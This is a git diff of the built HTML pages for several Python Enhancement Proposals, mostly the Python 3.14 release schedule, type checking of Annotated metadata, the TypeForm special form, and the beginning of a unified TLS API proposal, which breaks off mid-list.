Add GPU support

+

The JIT is currently CPU-only. It does not, for example, offload NumPy array +computations to CUDA GPUs, as JITs like Numba do.

+

There is already a rich ecosystem of tools for accelerating these sorts of +specialized tasks, and CPython’s JIT is not intended to replace them. Instead, +it is meant to improve the performance of general-purpose Python code, which is +less likely to benefit from deeper GPU integration.

+
+
+
+

Open Issues

+
+

Speed

+

Currently, the JIT is about as fast as the existing specializing interpreter +on most platforms. Improving this is obviously a top priority at this point, +since providing a significant performance gain is the entire motivation for +having a JIT at all. A number of proposed improvements are already underway, and +this ongoing work is being tracked in GH-115802.

+
+
+

Memory

+

Because it allocates additional memory for executable machine code, the JIT does +use more memory than the existing interpreter at runtime. According to the +official benchmarks, the JIT currently uses about 10-20% more memory than the +base interpreter. +The upper end of this range is due to aarch64-apple-darwin, which has larger +page sizes (and thus, a larger minimum allocation granularity).

+

However, these numbers should be taken with a grain of salt, as the benchmarks +themselves don’t actually have a very high baseline of memory usage. Since they +have a higher ratio of code to data, the JIT’s memory overhead is more +pronounced than it would be in a typical workload where memory pressure is more +likely to be a real concern.

+

Not much effort has been put into optimizing the JIT’s memory usage yet, so +these numbers likely represent a maximum that will be reduced over time. +Improving this is a medium priority, and is being tracked in GH-116017. We may consider +exposing configurable parameters for limiting memory consumption in the +future, but no official APIs will be exposed until the JIT meets the +requirements to be considered non-experimental.

+

Earlier versions of the JIT had a more complicated memory allocation scheme +which imposed a number of fragile limitations on the size and layout of the +emitted code, and significantly bloated the memory footprint of Python +executable. These issues are no longer present in the current design.

+
+
+

Dependencies

+

At the time of writing, the JIT has a build-time dependency on LLVM. LLVM +is used to compile individual micro-op instructions into blobs of machine code, +which are then linked together to form the JIT’s templates. These templates are +used to build CPython itself. The JIT has no runtime dependency on LLVM and is +therefore not at all exposed as a dependency to end users.

+

Building the JIT adds between 3 and 60 seconds to the build process, depending +on platform. It is only rebuilt whenever the generated files become out-of-date, +so only those who are actively developing the main interpreter loop will be +rebuilding it with any frequency.

+

Unlike many other generated files in CPython, the JIT’s generated files are not +tracked by Git. This is because they contain compiled binary code templates +specific to not only the host platform, but also the current build configuration +for that platform. As such, hosting them would require a significant engineering +effort in order to build and host dozens of large binary files for each commit +that changes the generated code. While perhaps feasible, this is not a priority, +since installing the required tools is not prohibitively difficult for most +people building CPython, and the build step is not particularly time-consuming.

+

Since some still remain interested in this possibility, discussion is being +tracked in GH-115869.

+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0744.rst

+

Last modified: 2024-09-12 20:31:23 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0745/index.html b/pep-0745/index.html new file mode 100644 index 00000000000..b7cf1675579 --- /dev/null +++ b/pep-0745/index.html @@ -0,0 +1,198 @@ + + + + + + + + PEP 745 – Python 3.14 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 745 – Python 3.14 Release Schedule

+
+
Author:
+
Hugo van Kemenade
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
24-Apr-2024
+
Python-Version:
+
3.14
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.14.

+
+
+

Release Manager and Crew

+
    +
  • 3.14 Release Manager: Hugo van Kemenade
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.14.0 schedule

+

The dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.14 development begins: Wednesday, 2024-05-08
  • +
  • 3.14.0 alpha 1: Tuesday, 2024-10-15
  • +
  • 3.14.0 alpha 2: Tuesday, 2024-11-19
  • +
  • 3.14.0 alpha 3: Tuesday, 2024-12-17
  • +
+

Expected:

+
    +
  • 3.14.0 alpha 4: Tuesday, 2025-01-14
  • +
  • 3.14.0 alpha 5: Tuesday, 2025-02-11
  • +
  • 3.14.0 alpha 6: Friday, 2025-03-14
  • +
  • 3.14.0 alpha 7: Tuesday, 2025-04-08
  • +
  • 3.14.0 beta 1: Tuesday, 2025-05-06 +(No new features beyond this point.)
  • +
  • 3.14.0 beta 2: Tuesday, 2025-05-27
  • +
  • 3.14.0 beta 3: Tuesday, 2025-06-17
  • +
  • 3.14.0 beta 4: Tuesday, 2025-07-08
  • +
  • 3.14.0 candidate 1: Tuesday, 2025-07-22
  • +
  • 3.14.0 candidate 2: Tuesday, 2025-08-26
  • +
  • 3.14.0 final: Wednesday, 2025-10-01
  • +
+

Subsequent bugfix releases every two months.

+
+
+

3.14 lifespan

+

Python 3.14 will receive bugfix updates approximately every two months for +approximately 24 months. Around the time of the release of 3.16.0 final, the +final 3.14 bugfix update will be released. After that, it is expected that +security updates (source only) will be released until five years after the +release of 3.14.0 final, so until approximately October 2030.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0745.rst

+

Last modified: 2024-12-17 16:46:38 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0746/index.html b/pep-0746/index.html new file mode 100644 index 00000000000..e7aa744bffa --- /dev/null +++ b/pep-0746/index.html @@ -0,0 +1,293 @@ + + + + + + + + PEP 746 – Type checking Annotated metadata | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 746 – Type checking Annotated metadata

+
+
Author:
+
Adrian Garcia Badaracco <adrian at adriangb.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
20-May-2024
+
Python-Version:
+
3.14
+
Post-History:
+
20-May-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a mechanism for type checking metadata that uses +the typing.Annotated type. Metadata objects that implement +the new __supports_annotated_base__ protocol will be type checked by static +type checkers to ensure that the metadata is valid for the given type.

+
+
+

Motivation

+

PEP 593 introduced Annotated as a way to attach runtime metadata to types. +In general, the metadata is not meant for static type checkers, but even so, +it is often useful to be able to check that the metadata makes sense for the given +type.

+

Take the first example in PEP 593, which uses Annotated to attach +serialization information to a field:

+
class Student(struct2.Packed):
+    name: Annotated[str, struct2.ctype("<10s")]
+
+
+

Here, the struct2.ctype("<10s") metadata is meant to be used by a serialization +library to serialize the field. Such libraries can only serialize a subset of types: +it would not make sense to write, for example, Annotated[list[str], struct2.ctype("<10s")]. +Yet the type system provides no way to enforce this. The metadata are completely +ignored by type checkers.

+

This use case comes up in libraries like pydantic and msgspec, which use +Annotated to attach validation and conversion information to fields or fastapi, +which uses Annotated to mark parameters as extracted from headers, query strings or +dependency injection.

+
+
+

Specification

+

This PEP introduces a protocol that can be used by static and runtime type checkers to validate +the consistency between Annotated metadata and a given type. +Objects that implement this protocol have an attribute called __supports_annotated_base__ +that specifies whether the metadata is valid for a given type:

+
class Int64:
+    __supports_annotated_base__: int
+
+
+

The attribute may also be marked as a ClassVar to avoid interaction with dataclasses:

+
from dataclasses import dataclass
+from typing import ClassVar
+
+@dataclass
+class Gt:
+    value: int
+    __supports_annotated_base__: ClassVar[int]
+
+
+

When a static type checker encounters a type expression of the form Annotated[T, M1, M2, ...], +it should enforce that for each metadata element in M1, M2, ..., one of the following is true:

+
    +
  • The metadata element evaluates to an object that does not have a __supports_annotated_base__ attribute; or
  • +
  • The metadata element evaluates to an object M that has a __supports_annotated_base__ attribute; +and T is assignable to the type of M.__supports_annotated_base__.
  • +
+

To support generic Gt metadata, one might write:

+
from typing import Protocol
+
+class SupportsGt[T](Protocol):
+    def __gt__(self, __other: T) -> bool:
+        ...
+
+class Gt[T]:
+    __supports_annotated_base__: ClassVar[SupportsGt[T]]
+
+    def __init__(self, value: T) -> None:
+        self.value = value
+
+x1: Annotated[int, Gt(0)] = 1  # OK
+x2: Annotated[str, Gt(0)] = 0  # type checker error: str is not assignable to SupportsGt[int]
+x3: Annotated[int, Gt(1)] = 0  # OK for static type checkers; runtime type checkers may flag this
+
+
+
+
+

Backwards Compatibility

+

Metadata that does not implement the protocol will be considered valid for all types, +so no breaking changes are introduced for existing code. The new checks only apply +to metadata objects that explicitly implement the protocol specified by this PEP.

+
+
+

Security Implications

+

None.

+
+
+

How to Teach This

+

This protocol is intended mostly for libraries that provide Annotated metadata; +end users of those libraries are unlikely to need to implement the protocol themselves. +The protocol should be mentioned in the documentation for typing.Annotated and +in the typing specification.

+
+
+

Reference Implementation

+

None yet.

+
+
+

Rejected ideas

+
+

Introducing a type variable instead of a generic class

+

We considered using a special type variable, AnnotatedT = TypeVar("AnnotatedT"), +to represent the type T of the inner type in Annotated; metadata would be +type checked against this type variable. However, this would require using the old +type variable syntax (before PEP 695), which is now a discouraged feature. +In addition, this would use type variables in an unusual way that does not fit well +with the rest of the type system.

+
+
+

Introducing a new type to typing.py that all metadata objects should subclass

+

A previous version of this PEP suggested adding a new generic base class, TypedMetadata[U], +that metadata objects would subclass. If a metadata object is a subclass of TypedMetadata[U], +then type checkers would check that the annotation’s base type is assignable to U. +However, this mechanism does not integrate as well with the rest of the language; Python +does not generally use marker base classes. In addition, it provides less flexibility than +the current proposal: it would not allow overloads, and it would require metadata objects +to add a new base class, which may make their runtime implementation more complex.

+
+
+

Using a method instead of an attribute for __supports_annotated_base__

+

We considered using a method instead of an attribute for the protocol, so that this method can be used +at runtime to check the validity of the metadata and to support overloads or returning boolean literals. +However, using a method adds boilerplate to the implementation and the value of the runtime use cases or +more complex scenarios involving overloads and returning boolean literals was not clear.

+
+
+
+

Acknowledgments

+

We thank Eric Traut for suggesting the idea of using a protocol and implementing provisional support in Pyright. +Thank you to Jelle Zijlstra for sponsoring this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0746.rst

+

Last modified: 2024-10-05 22:29:26 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0747/index.html b/pep-0747/index.html new file mode 100644 index 00000000000..7d487aeae33 --- /dev/null +++ b/pep-0747/index.html @@ -0,0 +1,719 @@ + + + + + + + + PEP 747 – Annotating Type Forms | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 747 – Annotating Type Forms

+
+
Author:
+
David Foster <david at dafoster.net>, Eric Traut <erictr at microsoft.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
27-May-2024
+
Python-Version:
+
3.14
+
Post-History:
+
19-Apr-2024, 04-May-2024, 17-Jun-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

Type expressions provide a standardized way +to specify types in the Python type system. When a type expression is +evaluated at runtime, the resulting type form object encodes the information +supplied in the type expression. This enables a variety of use cases including +runtime type checking, introspection, and metaprogramming.

+

Such use cases have proliferated, but there is currently no way to accurately +annotate functions that accept type form objects. Developers are forced to use +an overly-wide type like object, which makes some use cases impossible and +generally reduces type safety. This PEP addresses this limitation by +introducing a new special form typing.TypeForm.

+

This PEP makes no changes to the Python grammar. Correct usage of TypeForm is +intended to be enforced only by type checkers, not by the Python runtime.

+
+
+

Motivation

+

A function that operates on type form objects must understand how type +expression details are encoded in these objects. For example, int | str, +"int | str", list[int], and MyTypeAlias are all valid type +expressions, and they evaluate to instances of types.UnionType, +builtins.str, types.GenericAlias, and typing.TypeAliasType, +respectively.

+

There is currently no way to indicate to a type checker that a function accepts +type form objects and knows how to work with them. TypeForm addresses this +limitation. For example, here is a function that checks whether a value is +assignable to a specified type and returns None if it is not:

+
def trycast[T](typx: TypeForm[T], value: object) -> T | None: ...
+
+
+

The use of TypeForm and the type variable T describes a relationship +between the type form passed to parameter typx and the function’s +return type.

+

TypeForm can also be used with TypeIs to define custom type +narrowing behaviors:

+
def isassignable[T](value: object, typx: TypeForm[T]) -> TypeIs[T]: ...
+
+request_json: object = ...
+if isassignable(request_json, MyTypedDict):
+    assert_type(request_json, MyTypedDict)  # Type of variable is narrowed
+
+
+

The isassignable function implements something like an enhanced +isinstance check. This is useful for validating whether a value decoded +from JSON conforms to a particular structure of nested TypedDicts, +lists, unions, Literals, or any other type form that can be described +with a type expression. This kind of check was alluded to in +PEP 589 but could not be implemented without +TypeForm.

+
+

Why not type[C]?

+

One might think that type[C] would suffice for these use cases. However, +only class objects (instances of the builtins.type class) are assignable +to type[C]. Many type form objects do not meet this requirement:

+
def trycast[T](typx: type[T], value: object) -> T | None: ...
+
+trycast(str, 'hi')  # OK
+trycast(Literal['hi'], 'hi')  # Type violation
+trycast(str | None, 'hi')  # Type violation
+trycast(MyProtocolClass, obj)  # Type violation
+
+
+
+
+

TypeForm use cases

+

A survey of Python libraries reveals several categories of functions that +would benefit from TypeForm:

+
    +
  • Assignability checkers:
      +
    • Determines whether a value is assignable to a specified type
    • +
    • Pattern 1: def is_assignable[T](value: object, typx: TypeForm[T]) -> TypeIs[T]
    • +
    • Pattern 2: def is_match[T](value: object, typx: TypeForm[T]) -> TypeGuard[T]
    • +
    • Examples: beartype.is_bearable, trycast.isassignable, +typeguard.check_type, xdsl.isa
    • +
    +
  • +
+
    +
  • Converters:
      +
    • If a value is assignable to (or coercible to) a specified type, +a converter returns the value narrowed to (or coerced to) that type. +Otherwise, an exception is raised.
    • +
    • Pattern 1:
      def convert[T](value: object, typx: TypeForm[T]) -> T
      +
      +
      + +
    • +
    • Pattern 2:
      class Converter[T]:
      +    def __init__(self, typx: TypeForm[T]) -> None: ...
      +    def convert(self, value: object) -> T: ...
      +
      +
      + +
    • +
    +
  • +
+ +

The survey also identified some introspection functions that accept runtime +type forms as input. Today, these functions are annotated with object:

+
    +
  • General introspection operations: +
  • +
+

These functions accept values evaluated from arbitrary annotation expressions, +not just type expressions, so they cannot be altered to use TypeForm.

+
+
+
+

Specification

+

When a type expression is evaluated at runtime, the resulting value is a +type form object. This value encodes the information supplied in the type +expression, and it represents the type described by that type expression.

+

TypeForm is a special form that, when used in a type expression, describes +a set of type form objects. It accepts a single type argument, which must be a +valid type expression. TypeForm[T] describes the set of all type form +objects that represent the type T or types that are +assignable to T. For example, +TypeForm[str | None] describes the set of all type form objects +that represent a type assignable to str | None:

+
ok1: TypeForm[str | None] = str | None  # OK
+ok2: TypeForm[str | None] = str   # OK
+ok3: TypeForm[str | None] = None  # OK
+ok4: TypeForm[str | None] = Literal[None]  # OK
+ok5: TypeForm[str | None] = Optional[str]  # OK
+ok6: TypeForm[str | None] = "str | None"  # OK
+ok7: TypeForm[str | None] = Any  # OK
+
+err1: TypeForm[str | None] = str | int  # Error
+err2: TypeForm[str | None] = list[str | None]  # Error
+
+
+

By this same definition, TypeForm[Any] describes a type form object +that represents the type Any or any type that is assignable to Any. +Since all types in the Python type system are assignable to Any, +TypeForm[Any] describes the set of all type form objects +evaluated from all valid type expressions.

+

The type expression TypeForm, with no type argument provided, is +equivalent to TypeForm[Any].

+
+

Implicit TypeForm Evaluation

+

When a static type checker encounters an expression that follows all of the +syntactic, semantic and contextual rules for a type expression as detailed +in the typing spec, the evaluated type of this expression should be assignable +to TypeForm[T] if the type it describes is assignable to T.

+

For example, if a static type checker encounters the expression str | None, +it may normally evaluate its type as UnionType because it produces a +runtime value that is an instance of types.UnionType. However, because +this expression is a valid type expression, it is also assignable to the +type TypeForm[str | None]:

+
v1_actual: UnionType = str | None  # OK
+v1_type_form: TypeForm[str | None] = str | None  # OK
+
+v2_actual: type = list[int]  # OK
+v2_type_form: TypeForm = list[int]  # OK
+
+
+

The Annotated special form is allowed in type expressions, so it can +also appear in an expression that is assignable to TypeForm. Consistent +with the typing spec’s rules for Annotated, a static type checker may choose +to ignore any Annotated metadata that it does not understand:

+
v3: TypeForm[int | str] = Annotated[int | str, "metadata"]  # OK
+v4: TypeForm[Annotated[int | str, "metadata"]] = int | str  # OK
+
+
+

A string literal expression containing a valid type expression should likewise +be assignable to TypeForm:

+
v5: TypeForm[set[str]] = "set[str]"  # OK
+
+
+

Expressions that violate one or more of the syntactic, semantic, or contextual +rules for type expressions should not evaluate to a TypeForm type. The rules +for type expression validity are explained in detail within the typing spec, so +they are not repeated here:

+
bad1: TypeForm = tuple()  # Error: Call expression not allowed in type expression
+bad2: TypeForm = (1, 2)  # Error: Tuple expression not allowed in type expression
+bad3: TypeForm = 1  # Non-class object not allowed in type expression
+bad4: TypeForm = Self  # Error: Self not allowed outside of a class
+bad5: TypeForm = Literal[var]  # Error: Variable not allowed in type expression
+bad6: TypeForm = Literal[f""]  # Error: f-strings not allowed in type expression
+bad7: TypeForm = ClassVar[int]  # Error: ClassVar not allowed in type expression
+bad8: TypeForm = Required[int]  # Error: Required not allowed in type expression
+bad9: TypeForm = Final[int]  # Error: Final not allowed in type expression
+bad10: TypeForm = Unpack[Ts]  # Error: Unpack not allowed in this context
+bad11: TypeForm = Optional  # Error: Invalid use of Optional special form
+bad12: TypeForm = T  # Error if T is an out-of-scope TypeVar
+bad13: TypeForm = "int + str"  # Error: invalid quoted type expression
+
+
+
+
+

Explicit TypeForm Evaluation

+

TypeForm also acts as a function that can be called with a single argument. +Type checkers should validate that this argument is a valid type expression:

+
x1 = TypeForm(str | None)
+reveal_type(v1)  # Revealed type is "TypeForm[str | None]"
+
+x2 = TypeForm("list[int]")
+revealed_type(v2)  # Revealed type is "TypeForm[list[int]]"
+
+x3 = TypeForm('type(1)')  # Error: invalid type expression
+
+
+

At runtime the TypeForm(...) callable simply returns the value passed to it.

+

This explicit syntax serves two purposes. First, it documents the developer’s +intent to use the value as a type form object. Second, static type checkers +validate that all rules for type expressions are followed:

+
x4 = type(int)  # No error, evaluates to "type[int]"
+
+x5 = TypeForm(type(int))  # Error: call not allowed in type expression
+
+
+
+
+

Assignability

+

TypeForm has a single type parameter, which is covariant. That means +TypeForm[B] is assignable to TypeForm[A] if B is assignable to +A:

+
def get_type_form() -> TypeForm[int]: ...
+
+t1: TypeForm[int | str] = get_type_form()  # OK
+t2: TypeForm[str] = get_type_form()  # Error
+
+
+

type[T] is a subtype of TypeForm[T], which means that type[B] is +assignable to TypeForm[A] if B is assignable to A:

+
def get_type() -> type[int]: ...
+
+t3: TypeForm[int | str] = get_type()  # OK
+t4: TypeForm[str] = get_type()  # Error
+
+
+

TypeForm is a subtype of object and is assumed to have all of the +attributes and methods of object.

+
+
+
+

Backward Compatibility

+

This PEP clarifies static type checker behaviors when evaluating type +expressions in “value expression” contexts (that is, contexts where type +expressions are not mandated by the typing spec). In the absence of a +TypeForm type annotation, existing type evaluation behaviors persist, +so no backward compatibility issues are anticipated. For example, if a static +type checker previously evaluated the type of expression str | None as +UnionType, it will continue to do so unless this expression is assigned +to a variable or parameter whose type is annotated as TypeForm.

+
+
+

How to Teach This

+

Type expressions are used in annotations to describe which values are accepted +by a function parameter, returned by a function, or stored in a variable:

+
              parameter type   return type
+              |                |
+              v                v
+def plus(n1: int, n2: int) -> int:
+    sum: int = n1 + n2
+          ^
+          |
+          variable type
+
+    return sum
+
+
+

Type expressions evaluate to valid type form objects at runtime and can be +assigned to variables and manipulated like any other data in a program:

+
 a variable                   a type expression
+ |                            |
+ v                            v
+int_type_form: TypeForm = int | None
+                 ^
+                 |
+                 the type of a type form object
+
+
+

TypeForm[] is how you spell the type of a type form object, which is +a runtime representation of a type.

+

TypeForm is similar to type, but type is compatible only with +class objects like int, str, list, or MyClass. +TypeForm accommodates any type form that can be expressed using +a valid type expression, including those with brackets (list[int]), union +operators (int | None), and special forms (Any, LiteralString, +Never, etc.).

+

Most programmers will not define their own functions that accept a TypeForm +parameter or return a TypeForm value. It is more common to pass a type +form object to a library function that knows how to decode and use such objects.

+

For example, the isassignable function in the trycast library +can be used like Python’s built-in isinstance function to check whether +a value matches the shape of a particular type. isassignable accepts any +type form object as input.

+
    +
  • Yes:
    from trycast import isassignable
    +
    +if isassignable(some_object, MyTypedDict):  # OK: MyTypedDict is a TypeForm[]
    +    ...
    +
    +
    +
  • +
  • No:
    if isinstance(some_object, MyTypedDict):  # ERROR: MyTypedDict is not a type[]
    +    ...
    +
    +
    +
  • +
+
+
+

Advanced Examples

+

If you want to write your own runtime type checker or a function that +manipulates type form objects as values at runtime, this section provides +examples of how such a function can use TypeForm.

+
+

Introspecting type form objects

+

Functions like typing.get_origin and typing.get_args can be used to +extract components of some type form objects.

+
import typing
+
+def strip_annotated_metadata(typx: TypeForm[T]) -> TypeForm[T]:
+    if typing.get_origin(typx) is typing.Annotated:
+        typx = cast(TypeForm[T], typing.get_args(typx)[0])
+    return typx
+
+
+

isinstance and is can also be used to distinguish between different +kinds of type form objects:

+
import types
+import typing
+
+def split_union(typx: TypeForm) -> tuple[TypeForm, ...]:
+    if isinstance(typ, types.UnionType):  # X | Y
+        return cast(tuple[TypeForm, ...], typing.get_args(typ))
+    if typing.get_origin(typ) is typing.Union:  # Union[X, Y]
+        return cast(tuple[TypeForm, ...], typing.get_args(typ))
+    if typ in (typing.Never, typing.NoReturn,):
+        return ()
+    return (typ,)
+
+
+
+
+

Combining with a type variable

+

TypeForm can be parameterized by a type variable that is used elsewhere +within the same function definition:

+
def as_instance[T](typx: TypeForm[T]) -> T | None:
+    return typ() if isinstance(typ, type) else None
+
+
+
+
+

Combining with type

+

Both TypeForm and type can be parameterized by the same type +variable within the same function definition:

+
def as_type[T](typx: TypeForm[T]) -> type[T] | None:
+    return typ if isinstance(typ, type) else None
+
+
+
+
+

Combining with TypeIs and TypeGuard

+

A type variable can also be used by a TypeIs or TypeGuard return type:

+
def isassignable[T](value: object, typx: TypeForm[T]) -> TypeIs[T]: ...
+
+count: int | str = ...
+if isassignable(count, int):
+    assert_type(count, int)
+else:
+    assert_type(count, str)
+
+
+
+
+

Challenges When Accepting All TypeForms

+

A function that takes an arbitrary TypeForm as input must support a +variety of possible type form objects. Such functions are not easy to write.

+
    +
  • New special forms are introduced with each new Python version, and +special handling may be required for each one.
  • +
  • Quoted annotations [5] (like 'list[str]') +must be parsed (to something like list[str]).
  • +
  • Resolving quoted forward references inside type expressions is typically +done with eval(), which is difficult to use in a safe way.
  • +
  • Recursive types like IntTree = list[int | 'IntTree'] are difficult +to resolve.
  • +
  • User-defined generic types (like Django’s QuerySet[User]) can introduce +non-standard behaviors that require runtime support.
  • +
+
+
+
+

Reference Implementation

+

Pyright (version 1.1.379) provides a reference implementation for TypeForm.

+

Mypy contributors also plan to implement +support for TypeForm.

+

A reference implementation of the runtime component is provided in the +typing_extensions module.

+
+
+

Rejected Ideas

+
+

Alternative names

+

Alternate names were considered for TypeForm. TypeObject +and TypeType were deemed too generic. TypeExpression and TypeExpr +were also considered, but these were considered confusing because these objects +are not themselves “expressions” but rather the result of evaluating a type +expression.

+
+
+

Widen type[C] to support all type expressions

+

type was designed to describe class objects, subclasses of the +type class. A value with the type type is assumed to be instantiable +through a constructor call. Widening the meaning of type to represent +arbitrary type form objects would present backward compatibility problems +and would eliminate a way to describe the set of values limited to subclasses +of type.

+
+
+

Accept arbitrary annotation expressions

+

Certain special forms act as type qualifiers and can be used in +some but not all annotation contexts:

+

For example. the type qualifier Final can be used as a variable type but +not as a parameter type or a return type:

+
some_const: Final[str] = ...  # OK
+
+def foo(not_reassignable: Final[object]): ...  # Error: Final not allowed here
+
+def nonsense() -> Final[object]: ...  # Error: Final not alowed here
+
+
+

With the exception of Annotated, type qualifiers are not allowed in type +expressions. TypeForm is limited to type expressions because its +assignability rules are based on the assignability rules for types. It is +nonsensical to ask whether Final[int] is assignable to int because the +former is not a valid type expression.

+

Functions that wish to operate on objects that are evaluated from annotation +expressions can continue to accept such inputs as object parameters.

+
+
+

Pattern matching on type forms

+

It was asserted that some functions may wish to pattern match on the +interior of type expressions in their signatures.

+

One use case is to allow a function to explicitly enumerate all the +specific kinds of type expressions it supports as input. +Consider the following possible pattern matching syntax:

+
@overload
+def checkcast(typx: TypeForm[AT=Annotated[T, *A]], value: str) -> T: ...
+@overload
+def checkcast(typx: TypeForm[UT=Union[*Ts]], value: str) -> Union[*Ts]: ...
+@overload
+def checkcast(typx: type[C], value: str) -> C: ...
+# ... (more)
+
+
+

All functions observed in the wild that conceptually accept type form +objects generally try to support all kinds of type expressions, so it +doesn’t seem valuable to enumerate a particular subset.

+

Additionally, the above syntax isn’t precise enough to fully describe the +input constraints for a typical function in the wild. For example, many +functions do not support type expressions with quoted subexpressions +like list['Movie'].

+

A second use case for pattern matching is to explicitly match an Annotated +form to extract the interior type argument and strip away any metadata:

+
def checkcast(
+    typx: TypeForm[T] | TypeForm[AT=Annotated[T, *A]],
+    value: object
+) -> T:
+
+
+

However, Annotated[T, metadata] is already treated equivalent to T +by static type checkers. There’s no additional value in being explicit about +this behavior. The example above could more simply be written as the equivalent:

+
def checkcast(typx: TypeForm[T], value: object) -> T:
+
+
+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0747.rst

+

Last modified: 2024-09-29 12:39:10 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0748/index.html b/pep-0748/index.html new file mode 100644 index 00000000000..23db35030c2 --- /dev/null +++ b/pep-0748/index.html @@ -0,0 +1,1648 @@ + + + + + + + + PEP 748 – A Unified TLS API for Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 748 – A Unified TLS API for Python

+
+
Author:
+
Joop van de Pol <joop.vandepol at trailofbits.com>, +William Woodruff <william at yossarian.net>
+
Sponsor:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
27-Jun-2024
+
Python-Version:
+
3.14
+
Post-History:
+
17-Apr-2024
+
Replaces:
+
543
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP defines a standard TLS interface in the form of a collection of +protocol classes. This interface will allow Python implementations and +third-party libraries to provide bindings to TLS libraries other than OpenSSL.

+

These bindings can be used by tools that expect the interface provided by the +Python standard library, with the goal of reducing the dependence of the Python +ecosystem on OpenSSL.

+
+
+

Rationale

+

It has become increasingly clear that robust and user-friendly TLS support is an +extremely important part of the ecosystem of any popular programming language. +For most of its lifetime, this role in the Python ecosystem has primarily been +served by the ssl module, which provides a Python API to the OpenSSL +library.

+

Because the ssl module is distributed with the Python standard library, +it has become the overwhelmingly most popular method for handling TLS in Python. +A majority of Python libraries, both in the standard library and +on the Python Package Index, rely on the ssl module for their TLS +connectivity.

+

Unfortunately, the preeminence of the ssl module has had a number of +tied the entire Python +ecosystem tightly to OpenSSL. This has forced Python users to use OpenSSL even +in situations where it may provide a worse user experience than alternative TLS +implementations, which imposes a cognitive burden and makes it hard to provide +“platform-native” experiences.

+
+

Problems

+

The fact that the ssl module is built into the standard library has meant +that all standard-library Python networking libraries are entirely reliant on +the OpenSSL that the Python implementation has been linked against. This leads +to the following issues:

+
    +
  • It is difficult to take advantage of new, higher-security TLS without +recompiling Python to get a new OpenSSL. While there are third-party bindings +to OpenSSL (e.g. pyOpenSSL), these +need to be shimmed into a format that the standard library understands, +forcing projects that want to use them to maintain substantial compatibility +layers.
  • +
  • Windows distributions of Python need to be shipped with a copy of +OpenSSL. This puts the CPython development team in the position of being +OpenSSL redistributors, potentially needing to ship security updates to the +Windows Python distributions when OpenSSL vulnerabilities are released.
  • +
  • macOS distributions of Python need either to be shipped with a copy +of OpenSSL or linked against the system OpenSSL library. Apple has formally +deprecated linking against the system OpenSSL library, and even if they had +not, that library version has been unsupported by upstream for nearly one year +as of the time of writing. The CPython development team has started shipping +newer OpenSSLs with the Python available from python.org, but this has the +same problem as with Windows.
  • +
  • Users may wish to integrate with TLS libraries other than OpenSSL for other +reasons, such as maintenance burden versus a system-provided implementation, +or because OpenSSL is simply too large and unwieldy for their platform (e.g. +for embedded Python). Those users are left with the requirement to use +third-party networking libraries that can interact with their preferred TLS +library or to shim their preferred library into the OpenSSL-specific +ssl module API.
  • +
+

Additionally, the ssl module as implemented today limits the ability of +CPython itself to add support for alternative TLS implementations, or remove +OpenSSL support entirely, should either of these become necessary or useful. The +ssl module exposes too many OpenSSL-specific function calls and features +to easily map to an alternative TLS implementation.

+
+
+
+

Proposal

+

This PEP proposes to introduce a few new Protocol Classes in Python 3.14 to +provide TLS functionality that is not so strongly tied to OpenSSL. It also +proposes to update standard library modules to use only the interface exposed by +these protocol classes wherever possible. There are three goals here:

+
    +
  1. To provide a common API surface for both core and third-party developers to +target their TLS implementations to. This allows TLS developers to provide +interfaces that can be used by most Python code, and allows network +developers to have an interface that they can target that will work with a +wide range of TLS implementations.
  2. +
+
    +
  1. To provide an API that has few or no OpenSSL-specific concepts leak through. +The ssl module today has a number of warts caused by leaking OpenSSL +concepts through to the API: the new protocol classes would remove those +specific concepts.
  2. +
+
    +
  1. To provide a path for the core development team to make OpenSSL one of many +possible TLS implementations, rather than requiring that it be present on a +system in order for Python to have TLS support.
  2. +
+

The proposed interface is laid out below.

+
+

Interfaces

+

There are several interfaces that require standardization. Those interfaces are:

+
    +
